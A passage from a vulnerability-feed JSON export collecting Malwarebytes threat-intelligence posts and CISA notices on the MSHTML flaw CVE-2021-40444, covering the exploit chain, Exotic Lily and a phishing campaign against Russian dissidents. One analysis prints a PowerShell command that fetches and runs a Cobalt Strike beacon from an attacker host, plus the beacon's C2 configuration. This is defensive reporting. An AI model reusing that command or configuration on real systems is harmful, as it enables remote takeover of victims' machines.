doesn&#x27;t survive when it is handled by other applications, like for example, unzipping. Another problem are certain filetypes that use the same MSHTML to view webcontent, but are not protected by Office&#x27;s Protected View security feature. Researcher [Will Dormann](<https://twitter.com/wdormann/status/1435951560006189060>) was able to replicate the attasck using an RTF file.\n\nThe registry fix we posted to prevent ActiveX controls from running in Internet Explorer, were supposed to effectively block the current attacks. But, security researcher Kevin Beaumont has already [discovered a way](<https://twitter.com/GossiTheDog/status/1435570418623070210>) to bypass Microsoft&#x27;s current mitigations to exploit this vulnerability.\n\n### The attack chain\n\nThe researchers have also managed to reconstruct the attack chain with the use of a limited set of samples of malicious docx files. \n\n * Once a user clicks on the &#x27;Enable Editing&#x27; button, the exploit will load a _side.html_ file by using the mhtml protocol to open a URL. The _side.html _file is hosted at a remote site and will be loaded as a Word template.\n * The Internet Explorer browser will be started to load the HTML, and its obfuscated JavaScript code will exploit the CVE-2021-40444 vulnerability to create a malicious ActiveX control.\n * This ActiveX control will download a _ministry.cab_ file from a remote site.\n * And extract a _championship.inf_ file, which is actually a DLL, and execute it as a CPL file by using rundll32.exe.\n * The ultimate payload is a Cobalt Strike beacon, which would allow the threat actor to gain remote access to the device.\n\nGiven the few days that are left until next patch Tuesday, it is doubtful whether Microsoft will be able to come up with an effective patch.\n\nConsider me one happy camper that Malwarebytes does not rely on the MoTW flag.\n\n_This is what happened when I tried to &quot;edit&quot; the Word doc the researchers analyzed_\n\n## Update september 13, 2021\n\nAs [reported by BleepingComputer](<https://www.bleepingcomputer.com/news/microsoft/windows-mshtml-zero-day-exploits-shared-on-hacking-forums/>) threat actors are sharing PoCs, tutorials and exploits on hacking forums, so that every script kiddy and wannabe hacker can follow step-by-step instructions to build their own attacks. Since the method we mentioned that uses an RTF file even works in Windows explorer file previews. This means this vulnerability can be exploited by viewing a malicious document using the Windows Explorer preview feature.\n\nSince this was discovered, Microsoft has added the following mitigation to disable previewing of RTF and Word documents:\n\n 1. In the Registry Editor (regedit.exe), navigate to the appropriate registry key: **For Word documents, navigate to these keys:**\n * HKEY_CLASSES_ROOT.docx\\ShellEx{8895b1c6-b41f-4c1c-a562-0d564250836f}\n * HKEY_CLASSES_ROOT.doc\\ShellEx{8895b1c6-b41f-4c1c-a562-0d564250836f}\n * HKEY_CLASSES_ROOT.docm\\ShellEx{8895b1c6-b41f-4c1c-a562-0d564250836f} **For rich text files (RTF), navigate to this key:**\n * HKEY_CLASSES_ROOT.rtf\\ShellEx{8895b1c6-b41f-4c1c-a562-0d564250836f}\n 2. Export a copy of the Registry key as a backup.\n 3. Now double-click **Name** and in the **Edit String** dialog box, delete the Value Data.\n 4. Click **OK**,\n\nWord document and RTF file previews are now disabled in Windows Explorer.\n\nTo enable Windows Explorer preview for these documents, double-click on the backup .reg file you created in step 2 above.\n\nStay safe,everyone!\n\nThe post [[updated] Windows MSHTML zero-day actively exploited, mitigations required](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/windows-mshtml-zero-day-actively-exploited-mitigations-required/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2021-09-08T11:04:07", "type": "malwarebytes", "title": "[updated] Windows MSHTML zero-day actively exploited, mitigations required", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-08T11:04:07", "id": "MALWAREBYTES:DB54B348AF1AC41987150B5CE7B1BC66", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/windows-mshtml-zero-day-actively-exploited-mitigations-required/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-03-18T23:27:45", "description": "The Google Threat Analysis Group (TAG) has shared their observations about a group of cybercriminals called Exotic Lily. This group has specialized itself as an initial access broker, which means they find a vulnerability in an organization&#x27;s defenses, exploit that vulnerability, and sell the access to the victim&#x27;s network to an interested party, several times over with different victims.\n\nAmong these interested parties TAG found the [Conti](<https://blog.malwarebytes.com/threat-spotlight/2021/05/threat-spotlight-conti-the-ransomware-used-in-the-hse-healthcare-attack/>) and Diavol ransomware groups. Because Exotic Lily&#x27;s methods involved a lot of detail, they are believed to require a level of human interaction that is rather unusual for cybercrime groups focused on large scale operations.\n\n## Initial access broker\n\nLike in any maturing industry, you can expect to see specialization and diversification. Initial access brokers are an example of specialized cybercriminals. They will use a vulnerability to gain initial access, and, probably based on the nature of the target, sell this access to other cybercriminals that can use this access to deploy their specific malware.\n\nThese initial access brokers are different from the usual ransomware affiliates that will deploy the ransomware they are affiliated with themselves and use the infrastructure provided by the ransomware as a service (RaaS) group to get a chunk of the ransom if the victim decides to pay. The RaaS will provide the encryption software, the contact and leak sites, and negotiate the ransom with the victim. An initial access broker will inform another cybercriminal by letting them know they have found a way in at company xyz, and inquire how much they are willing to pay for that access.\n\n## Exotic Lily\n\nFrom the [TAG blog](<https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/>) we can learn that Exotic Lily was very much specialized. Their initial attack vector was email. Initially, they were targeting specific industries such as IT, cybersecurity, and healthcare, but that focus has become less stringent.\n\nTheir email campaigns gained credibility by spoofing companies and employees. Their email campaigns were targeted to a degree that they are believed to be sent by real human operators using little to no automation. To evade detection mechanisms they used common services like WeTransfer, TransferNow, and OneDrive to deliver the payload.\n\nLast year, researchers found that Exotic Lily used the vulnerability listed as [CVE-2021-40444](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40444>), a Microsoft MSHTML Remote Code Execution (RCE) vulnerability. Microsoft also posted a [blog](<https://www.microsoft.com/security/blog/2021/09/15/analyzing-attacks-that-exploit-the-mshtml-cve-2021-40444-vulnerability/>) about attacks that exploited this vulnerability. Later, the group shifted to using customized versions of [BazarLoader](<https://blog.malwarebytes.com/detections/trojan-bazar/>) delivered inside ISO files.\n\nBased on the fact that the Exotic Lily\u2019s operations require a lot of human interaction, the researchers did an analysis of the \u201cworking hours\u201d and came to the conclusion that it looks like a regular 9 to 5 operation located in a Central or Eastern Europe time zone.\n\n## Social engineering\n\nAs with most email campaigns the amount of social engineering largely defines how successful such a campaign can be. Between the millions of emails sent in a &quot;spray-and-pray&quot; attack, to the thousands that Exotic Lily sends out per day, there is a huge difference in success rate.\n\nExotic Lily used identity [spoofing](<https://blog.malwarebytes.com/cybercrime/2016/06/email-spoofing/>) where they replaced the TLD for a legitimate domain and replaced it with \u201c.us\u201d, \u201c.co\u201d or \u201c.biz\u201d. At first, the group would create entirely fake personas posing as employees of a real company. These personas would come including social media profiles, personal websites, and AI generated profile pictures. That must have been a lot of work, so at some point the group started to impersonate real company employees by copying their personal data from social media and business databases such as RocketReach and CrunchBase.\n\nUsing such spoofed accounts, the attackers would send [spear phishing](<https://blog.malwarebytes.com/social-engineering/2020/01/spear-phishing-101-what-you-need-to-know/>) emails with a business proposal and even engage in further communication with the target by attempting to schedule a meeting to discuss the project&#x27;s design or requirements.\n\n## IOC\u2019s\n\nSHA-256 hashes of the **BazarLoader** ISO samples:\n\n * 5ceb28316f29c3912332065eeaaebf59f10d79cd9388ef2a7802b9bb80d797be\n * 9fdec91231fe3a709c8d4ec39e25ce8c55282167c561b14917b52701494ac269\n * c896ee848586dd0c61c2a821a03192a5efef1b4b4e03b48aba18eedab1b864f7\n\nSHA-256 hashes of the **BUMBLEBEE** ISO samples:\n\n * 9eacade8174f008c48ea57d43068dbce3d91093603db0511467c18252f60de32\n * 6214e19836c0c3c4bc94e23d6391c45ad87fdd890f6cbd3ab078650455c31dc8\n * 201c4d0070552d9dc06b76ee55479fc0a9dfacb6dbec6bbec5265e04644eebc9\n * 1fd5326034792c0f0fb00be77629a10ac9162b2f473f96072397a5d639da45dd\n * 01cc151149b5bf974449b00de08ce7dbf5eca77f55edd00982a959e48d017225\n\n**IP** address of the [C&amp;C server](<https://blog.malwarebytes.com/glossary/cc/>):\n\n * 23.81.246.187\n\nStay safe, everyone!\n\nThe post [Meet Exotic Lily, access broker for ransomware and other malware peddlers](<https://blog.malwarebytes.com/threat-spotlight/2022/03/meet-exotic-lily-access-broker-for-ransomware-and-other-malware-peddlers/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-03-18T22:58:48", "type": "malwarebytes", "title": "Meet Exotic Lily, access broker for ransomware and other malware peddlers", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-03-18T22:58:48", "id": "MALWAREBYTES:F1563A57212EB7AEC347075E94FF1605", "href": "https://blog.malwarebytes.com/threat-spotlight/2022/03/meet-exotic-lily-access-broker-for-ransomware-and-other-malware-peddlers/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-31T15:44:27", "description": "_This blog post was authored by Hossein Jazi._\n\n-- _Updated to clarify the two different campaigns (Cobalt Strike and Rat)_\n\nSeveral threat actors have taken advantage of the war in Ukraine to launch a number of cyber attacks. The Malwarebytes Threat Intelligence team is actively monitoring these threats and has observed activities associated with the geopolitical conflict.\n\nMore specifically, we&#x27;ve witnessed several APT actors such as [Mustang Panda](<https://twitter.com/h2jazi/status/1501198521139175427>), [UNC1151](<https://twitter.com/h2jazi/status/1500607147989684224>) and [SCARAB](<https://twitter.com/h2jazi/status/1505887653111209994>) that have used war-related themes to target mostly Ukraine. We&#x27;ve also observed several different [wipers](<https://blog.malwarebytes.com/threat-intelligence/2022/03/hermeticwiper-a-detailed-analysis-of-the-destructive-malware-that-targeted-ukraine/>) and cybercrime groups such as [FormBook](<https://blog.malwarebytes.com/threat-intelligence/2022/03/formbook-spam-campaign-targets-citizens-of-ukraine%EF%B8%8F/>) using the same tactics. Beside those known groups we saw an [actor](<https://twitter.com/h2jazi/status/1501941517409083397>) that used multiple methods to deploy a variants of Quasar Rat. These methods include using documents that exploit CVE-2017-0199 and CVE-2021-40444, macro-embedded documents, and executables. \n\nOn March 23, we identified a new campaign that instead of targeting Ukraine is focusing on Russian citizens and government entities. Based on the email content it is likely that the threat actor is targeting people that are against the Russian government.\n\nThe spear phishing emails are warning people that use websites, social networks, instant messengers and VPN services that have been banned by the Russian Government and that criminal charges will be laid. Victims are lured to open a malicious attachment or link to find out more, only to be infected with Cobalt Strike.\n\n## Spear phishing as the main initial infection vector\n\nThese emails pretend to be from the &quot;Ministry of Digital Development, Telecommunications and Mass Communications of the Russian Federation&quot; and &quot;Federal Service for Supervision of Communications, Information Technology and Mass Communications&quot; of Russia.\n\nWe have observed two documents associated with this campaign that both exploit CVE-2021-40444. Even though CVE-2021-40444 has been used in a few attacks in the past, to the best of our knowledge this was the first time we observed an attacker use RTF files instead of Word documents to exploit this vulnerability. Also the actor leveraged a new variant of this exploit called CABLESS in this attack. [Sophos](<https://news.sophos.com/en-us/2021/12/21/attackers-test-cab-less-40444-exploit-in-a-dry-run/>) has reported an attack that used a Cabless variant of this exploit but in that case the actor has not used the RTF file and also used RAR file to prepend the WSF data to it.\n\n * **Email with RTF file: **\n * _\u0424\u0435\u0434\u0435\u0440\u0430\u043b\u044c\u043d\u0430\u044f \u0441\u043b\u0443\u0436\u0431\u0430 \u043f\u043e \u043d\u0430\u0434\u0437\u043e\u0440\u0443 \u0432 \u0441\u0444\u0435\u0440\u0435 \u0441\u0432\u044f\u0437\u0438, \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u043e\u043d\u043d\u044b\u0445 \u0442\u0435\u0445\u043d\u043e\u043b\u043e\u0433\u0438\u0439 \u0438 \u043c\u0430\u0441\u0441\u043e\u0432\u044b\u0445 \u043a\u043e\u043c\u043c\u0443\u043d\u0438\u043a\u0430\u0446\u0438\u0439_ (Federal Service for Supervision of Communications, Information Technology and Mass Communications)\n * _\u041f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0435\u043d\u0438\u0435! \u041c\u0438\u043d\u0438\u0441\u0442\u0435\u0440\u0441\u0442\u0432\u043e \u0446\u0438\u0444\u0440\u043e\u0432\u043e\u0433\u043e \u0440\u0430\u0437\u0432\u0438\u0442\u0438\u044f, \u0441\u0432\u044f\u0437\u0438 \u0438 \u043c\u0430\u0441\u0441\u043e\u0432\u044b\u0445 \u043a\u043e\u043c\u043c\u0443\u043d\u0438\u043a\u0430\u0446\u0438\u0439 \u0420\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u043e\u0439 \u0424\u0435\u0434\u0435\u0440\u0430\u0446\u0438\u0438_ (A warning! Ministry of Digital Development, Telecommunications and Mass Media of the Russian Federation)\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/phish1-2.png> \"\" )Figure 1: Phishing template\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/phish2.png> \"\" )Figure 2: Phishing template \n\n * **Email with archive file:**\n * _\u0438\u043d\u0444\u043e\u0440\u043c\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u043d\u0430\u0441\u0435\u043b\u0435\u043d\u0438\u044f \u043e\u0431 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0445 \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u044f\u0445 \u0432 \u0441\u0444\u0435\u0440\u0435 \u0446\u0438\u0444\u0440\u043e\u0432\u044b\u0445 \u0442\u0435\u0445\u043d\u043e\u043b\u043e\u0433\u0438\u0439, \u0441\u0435\u0440\u0432\u0438\u0441\u043e\u0432, \u0441\u0430\u043d\u043a\u0446\u0438\u0439 \u0438 \u0443\u0433\u043e\u043b\u043e\u0432\u043d\u043e\u0439 \u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0435\u043d\u043d\u043e\u0441\u0442\u0438 \u0437\u0430 \u0438\u0445 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435_. (informing the public about critical changes in the field of digital technologies, services, sanctions and criminal liability for their use.)\n * _\u0412\u043d\u0438\u043c\u0430\u043d\u0438\u0435! \u0418\u043d\u0444\u043e\u0440\u043c\u0438\u0440\u0443\u0435\u0442 \u041c\u0438\u043d\u0438\u0441\u0442\u0435\u0440\u0441\u0442\u0432\u043e \u0446\u0438\u0444\u0440\u043e\u0432\u043e\u0433\u043e \u0440\u0430\u0437\u0432\u0438\u0442\u0438\u044f, \u0441\u0432\u044f\u0437\u0438 \u0438 \u043c\u0430\u0441\u0441\u043e\u0432\u044b\u0445 \u043a\u043e\u043c\u043c\u0443\u043d\u0438\u043a\u0430\u0446\u0438\u0439 \u0420\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u043e\u0439 \u0424\u0435\u0434\u0435\u0440\u0430\u0446\u0438\u0438_ (Attention! Informs the Ministry of Digital Development, Communications and Mass Media of the Russian Federation)\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/phish4.png> \"\" )Figure 3: Phishing template \n\n * **Email with link:**\n * _\u0412\u043d\u0438\u043c\u0430\u043d\u0438\u0435! \u0418\u043d\u0444\u043e\u0440\u043c\u0438\u0440\u0443\u0435\u0442 \u041c\u0438\u043d\u0438\u0441\u0442\u0435\u0440\u0441\u0442\u0432\u043e \u0446\u0438\u0444\u0440\u043e\u0432\u043e\u0433\u043e \u0440\u0430\u0437\u0432\u0438\u0442\u0438\u044f, \u0441\u0432\u044f\u0437\u0438 \u0438 \u043c\u0430\u0441\u0441\u043e\u0432\u044b\u0445 \u043a\u043e\u043c\u043c\u0443\u043d\u0438\u043a\u0430\u0446\u0438\u0439 \u0420\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u043e\u0439 \u0424\u0435\u0434\u0435\u0440\u0430\u0446\u0438\u0438_ (Attention! Informs the Ministry of Digital Development, Communications and Mass Media of the Russian Federation)\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/phish3.png> \"\" )Figure 4: phishing template \n\n## Victimology\n\nThe actor has sent its spear phishing emails to people that had email with these domains: \n\n_mail.ru, mvd.ru, yandex.ru, cap.ru, minobr-altai.ru, yandex.ru, stavminobr.ru, mon.alania.gov.ru, astrobl.ru, 38edu.ru, mosreg.ru, mo.udmr.ru, minobrnauki.gov.ru, 66.fskn.gov.ru, bk.ru, ukr.net_\n\nBased on these domains, here is the list of potential victims:\n\n * Portal of authorities of the Chuvash Republic Official Internet portal\n * Russian Ministry of Internal Affairs\n * ministry of education and science of the republic of Altai \n * Ministry of Education of the Stavropol Territory\n * Minister of Education and Science of the Republic of North Ossetia-Alania\n * Government of Astrakhan region \n * Ministry of Education of the Irkutsk region \n * Portal of the state and municipal service Moscow region \n * Ministry of science and higher education of the Russian Federation\n\n## Analysis:\n\nThe lures used by the threat actor are in Russian language and pretend to be from Russia&#x27;s &quot;Ministry of Information Technologies and Communications of the Russian Federation&quot; and &quot;MINISTRY OF DIGITAL DEVELOPMENT, COMMUNICATIONS AND MASS COMMUNICATIONS&quot;. One of them is a letter about limitation of access to Telegram application in Russia. \n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/russia.png> \"\" )Figure 5: Lure letter\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/cveblock.png> \"\" )Figure 6: Lure template\n\n \nThese RTF files contains an embedded url that downloads an html file which exploits the vulnerability in the MSHTML engine. \n`http://wallpaper.skin/office/updates/GtkjdsjkyLkjhsTYhdsd/exploit.html`\n\nThe html file contains a script that executes the script in WSF data embedded in the RTF file. \n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/Screen-Shot-2022-03-25-at-2.37.47-PM.png> \"\" )Figure 7: html file\n\n \nThe actor has added WSF data (Windows Script Host) at the start of the RTF file. As you can see from figure 8, WSF data contains a JScript code that can be accessed from a remote location. In this case this data has been accessed using the downloaded html exploit file. \n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/Screen-Shot-2022-03-25-at-1.43.00-PM.png> \"\" )Figure 8: WSF data\n\nExecuting this scripts leads to spawning PowerShell to download a CobaltStrike beacon from the remote server and execute it on the victim&#x27;s machine. (The deployed CobaltStrike file name is Putty) \n \n \n \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -windowstyle hidden $ProgressPreference = 'SilentlyContinue'; Invoke-WebRequest 'http://wallpaper.skin/office/updates/GtkjdsjkyLkjhsTYhdsd/putty.exe' -OutFile $env:TEMP\\putty.exe; . $env:TEMP\\putty.exe; Start-Sleep 15\n\nThe following shows the CobaltStrike config:\n \n \n {\n \"BeaconType\": [\n \"HTTPS\"\n ],\n \"Port\": 443,\n \"SleepTime\": 38500,\n \"MaxGetSize\": 1398151,\n \"Jitter\": 27,\n \"C2Server\": \"wikipedia-book.vote,/async/newtab_ogb\",\n \"HttpPostUri\": \"/gen_204\",\n \"Malleable_C2_Instructions\": [\n \"Remove 17 bytes from the end\",\n \"Remove 32 bytes from the beginning\",\n \"Base64 URL-safe decode\"\n ],\n \"SpawnTo\": \"/4jEZLD/DHKDj1CbBvlJIg==\",\n \"HttpGet_Verb\": \"GET\",\n \"HttpPost_Verb\": \"POST\",\n \"HttpPostChunk\": 96,\n \"Spawnto_x86\": \"%windir%\\\\syswow64\\\\gpupdate.exe\",\n \"Spawnto_x64\": \"%windir%\\\\sysnative\\\\gpupdate.exe\",\n \"CryptoScheme\": 0,\n \"Proxy_Behavior\": \"Use IE settings\",\n \"Watermark\": 1432529977,\n \"bStageCleanup\": \"True\",\n \"bCFGCaution\": \"True\",\n \"KillDate\": 0,\n \"bProcInject_StartRWX\": \"True\",\n \"bProcInject_UseRWX\": \"False\",\n \"bProcInject_MinAllocSize\": 16700,\n \"ProcInject_PrependAppend_x86\": [\n \"kJCQ\",\n \"Empty\"\n ],\n \"ProcInject_PrependAppend_x64\": [\n \"kJCQ\",\n \"Empty\"\n ],\n \"ProcInject_Execute\": [\n \"ntdll.dll:RtlUserThreadStart\",\n \"SetThreadContext\",\n \"NtQueueApcThread-s\",\n \"kernel32.dll:LoadLibraryA\",\n \"RtlCreateUserThread\"\n ],\n \"ProcInject_AllocationMethod\": \"NtMapViewOfSection\",\n \"bUsesCookies\": \"True\",\n \"HostHeader\": \"\"\n }\n\n## Similar lure used by another actor\n\nWe also have identified activity by another actor that uses a similar lure as the one used in the previously mentioned campaign. This activity is potentially related to [Carbon Spider](<https://www.virustotal.com/gui/domain/swordoke.com/community>) and uses &quot;_\u0424\u0435\u0434\u0435\u0440\u0430\u043b\u044c\u043d\u0430\u044f \u0441\u043b\u0443\u0436\u0431\u0430 \u043f\u043e \u043d\u0430\u0434\u0437\u043e\u0440\u0443 \u0432 \u0441\u0444\u0435\u0440\u0435 \u0441\u0432\u044f\u0437\u0438, \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u043e\u043d\u043d\u044b\u0445 \u0442\u0435\u0445\u043d\u043e\u043b\u043e\u0433\u0438\u0439 \u0438 \u043c\u0430\u0441\u0441\u043e\u0432\u044b\u0445 \u043a\u043e\u043c\u043c\u0443\u043d\u0438\u043a\u0430\u0446\u0438\u0439_&quot; (Federal Service for Supervision of Communications, Information Technology and Mass Communications) of Russia as a template. In this case, the threat actor has deployed a PowerShell-based Rat. \n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/block-doc1.png> \"\" )Figure 9: template\n\nThe dropped PowerShell script is obfuscated using a combination of Base64 and custom obfuscation. \n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/ps-dropped.png> \"\" )Figure 10: Dropped PS script\n\nAfter deobfuscating the script, you can see the Rat deployed by this actor. This PowerShell based Rat has the capability to get the next stage payload and execute it. The next stage payload can be one of the following file types:\n\n * JavaScript\n * PowerShell\n * Executable\n * DLL\n\nAll of Its communications with its server are in Base64 format. This Rat starts its activity by setting up some configurations which include the C2 url, intervals, debug mode and a parameter named group that initialized with &quot;Madagascar&quot; which probably is another alias of the actor. \n\nAfter setting up the configuration, it calls the &quot;Initialize-Engine&quot; function. This function collects the victim&#x27;s info including OS info, Username, Hostname, Bios info and also a host-domain value that shows if the machine in a domain member or not. It then appends all the collected into into a string and separate them by &quot;|&quot; character and at the end it add the group name and API config value. The created string is being send to the server using _Send-WebInit_ function. This function adds &quot;INIT%%%&quot; string to the created string and base64 encodes it and sends it to the server. \n\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/ps-deobfuscated.png> \"\" )Figure 11: PowerShell Rat\n\nAfter performing the initialization, it goes into a loop that keeps calling the &quot;Invoke-Engine&quot; function. This function checks the incoming tasks from the server, decodes them and calls the proper function to execute the incoming task. If there is no task to execute, it sends &quot;GETTASK%%&quot; in Base64 format to its server to show it is ready to get tasks and execute them. The &quot;IC&quot; command is used to delete itself.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/invoke-task.png> \"\" )Figure 12: Invoke task\n\nThe result of the task execution will be send to the server using &quot;PUTTASK%%&quot; command. \n\n## Infrastructure\n\nThe following shows the infrastructure used by this actor highlighting that the different lures are all connected. \n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/undefined.png> \"\" )Figure 12: Infrastructure \n\nThe Malwarebytes Threat Intelligence continues to monitor cyber attacks related to the Ukraine war. We are protecting our customers and sharing additional indicators of compromise.\n\n## IOCs\n\n**RTF files host domain: ** \ndigital-ministry[.]ru \n**RTF files:** \nPKH telegram.rtf \nb19af42ff8cf0f68e520a88f40ffd76f53a27dffa33b313fe22192813d383e1e \nPKH.rtf \n38f2b578a9da463f555614e9ca9036337dad0af4e03d89faf09b4227f035db20 \n**MSHTML exploit: ** \nwallpaper[.]skin/office/updates/GtkjdsjkyLkjhsTYhdsd/exploit.html \n4e1304f4589a706c60f1f367d804afecd3e08b08b7d5e6bd8c93384f0917385c \n**CobaltStrike Download URL:** \nwallpaper[.]skin/office/updates/GtkjdsjkyLkjhsTYhdsd/putty.exe \n**CobaltStrike:** \nPutty.exe \nd4eaf26969848d8027df7c8c638754f55437c0937fbf97d0d24cd20dd92ca66d \n**CobaltStrike C2:** \nwikipedia-book[.]vote/async/newtab_ogb \n**Macro based maldoc: \n**c7dd490adb297b7f529950778b5a426e8068ea2df58be5d8fd49fe55b5331e28 \n**PowerShell based RAT:** \n9d4640bde3daf44cc4258eb5f294ca478306aa5268c7d314fc5019cf783041f0** \nPowerShell Rat C2:** \nswordoke[.]com** \n** \n \n\n\n \n\n\nThe post [New spear phishing campaign targets Russian dissidents](<https://blog.malwarebytes.com/threat-intelligence/2022/03/new-spear-phishing-campaign-targets-russian-dissidents/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-03-29T18:02:48", "type": "malwarebytes", "title": "New spear phishing campaign targets Russian dissidents", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0199", "CVE-2021-40444"], "modified": "2022-03-29T18:02:48", "id": "MALWAREBYTES:FC8647475CCD473D01B5C0257286E101", "href": "https://blog.malwarebytes.com/threat-intelligence/2022/03/new-spear-phishing-campaign-targets-russian-dissidents/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cisa": [{"lastseen": "2021-11-26T18:09:51", "description": "Microsoft has released mitigations and workarounds to address a remote code execution vulnerability (CVE-2021-40444) in Microsoft Windows. Exploitation of this vulnerability may allow a remote attacker to take control of an affected system. This vulnerability has been detected in exploits in the wild. \n\nCISA encourages users and administrators to review [Microsoft\u2019s advisory](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444 >) and to implement the mitigations and workarounds.\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/09/07/microsoft-releases-mitigations-and-workarounds-cve-2021-40444>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-07T00:00:00", "type": "cisa", "title": "Microsoft Releases Mitigations and Workarounds for CVE-2021-40444 ", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-07T00:00:00", "id": "CISA:C70D91615E3DC8B589B493118D474566", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/09/07/microsoft-releases-mitigations-and-workarounds-cve-2021-40444", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-15T11:40:48", "description": "Ivanti has updated its [Log4j Advisory](<https://forums.ivanti.com/s/article/CVE-2021-44228-Java-logging-library-log4j-Ivanti-Products-Impact-Mapping?language=en_US>) with security updates for multiple products to address CVE-2021-44228. An unauthenticated attacker could exploit this vulnerability to take control of an affected system.\n\nCISA encourages users and administrators to review the Ivanti security advisories pages for [Avalanche](<https://forums.ivanti.com/s/article/CVE-2021-44228-Avalanche-Remote-code-injection-Log4j?language=en_US>); 